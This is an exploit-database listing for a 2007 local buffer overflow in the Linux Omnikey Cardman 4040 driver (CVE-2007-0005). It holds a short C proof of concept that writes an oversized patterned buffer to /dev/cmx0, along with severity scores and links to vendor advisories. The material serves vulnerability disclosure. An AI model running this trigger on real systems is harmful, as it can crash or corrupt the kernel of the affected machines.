Lucene search
Daniel RoethlisbergerEDB-ID:3441HistoryMar 09, 2007 - 12:00 a.m.
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
2007-03-0900:00:00
Daniel Roethlisberger
www.exploit-db.com
30
6.8 Medium
AI Score
Confidence
Low
6.9 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
0.0004 Low
EPSS
Percentile
0.4%
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger <[email protected]>
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/
#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>
int main(int argc, char *argv[]) {
int fd, i, n;
char buf[8192];
/*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
*/
for (i = 0; i < sizeof(buf); i += 2) {
buf[i] = (char)(((i/2) & 0xFF00) >> 8);
buf[i+1] = (char) ((i/2) & 0x00FF);
}
if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
printf("Error: open() => %s\n", strerror(errno));
exit(errno);
}
if ((n = write(fd, buf, sizeof(buf))) < 0) {
printf("Error: write() => %s\n", strerror(errno));
exit(errno);
}
printf("%d of %d bytes written\n", n, sizeof(buf));
exit(0);
}
// milw0rm.com [2007-03-09]Related
exploitpack
exploitpack
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
2007-03-09 00:00:00
Man Command - -H Flag Local Buffer Overflow
2007-04-06 00:00:00
cve
cve
CVE-2007-0005
2007-03-10 00:19:00
veracode
veracode
Arbitrary Code Execution
2020-04-10 00:13:43
packetstorm
packetstorm
csa-driver.txt
2007-03-13 00:00:00
securityvulns
securityvulns
Buffer Overflow in Linux Drivers for Omnikey CardMan 4040 (CVE-2007-0005)
2007-03-09 00:00:00
Omnikey CardMan 4040 linux driver buffer overflow
2007-03-09 00:00:00
[USN-489-1] Linux kernel vulnerabilities
2007-07-19 00:00:00
seebug
seebug
Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC
2007-03-09 00:00:00
Man Command -H Flag Local Buffer Overflow Vulnerability
2014-07-01 00:00:00
prion
prion
Buffer overflow
2007-03-10 00:19:00
ubuntucve
ubuntucve
CVE-2007-0005
2007-03-10 00:00:00
exploitdb
exploitdb
Man Command - -H Flag Local Buffer Overflow
2007-04-06 00:00:00
openvas
openvas
Fedora Update for kernel FEDORA-2007-335
2009-02-27 00:00:00
Fedora Update for kernel FEDORA-2007-335
2009-02-27 00:00:00
Fedora Update for kernel FEDORA-2007-433
2009-02-27 00:00:00
fedora
fedora
[SECURITY] Fedora Core 6 Update: kernel-2.6.20-1.2925.fc6
2007-03-14 20:19:42
[SECURITY] Fedora Core 5 Update: kernel-2.6.20-1.2300.fc5
2007-03-14 20:26:01
[SECURITY] Fedora Core 5 Update: kernel-2.6.20-1.2312.fc5
2007-04-13 19:42:37
nessus
nessus
Fedora Core 5 : kernel-2.6.20-1.2300.fc5 (2007-336)
2007-03-16 00:00:00
Fedora Core 6 : kernel-2.6.20-1.2925.fc6 (2007-335)
2007-03-16 00:00:00
RHEL 5 : kernel (RHSA-2007:0099)
2007-05-25 00:00:00
redhat
redhat
(RHSA-2007:0099) Important: kernel security and bug fix update
2007-03-14 00:00:00
osv
osv
linux-2.6
2007-05-02 00:00:00
debian
debian
ubuntu
ubuntu
Linux kernel vulnerabilities
2007-07-18 00:00:00
Linux kernel vulnerabilities
2007-07-19 00:00:00
oraclelinux
oraclelinux
Important: kernel security and bug fix update
2007-06-26 00:00:00
6.8 Medium
AI Score
Confidence
Low
6.9 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
0.0004 Low
EPSS
Percentile
0.4%
Related for EDB-ID:3441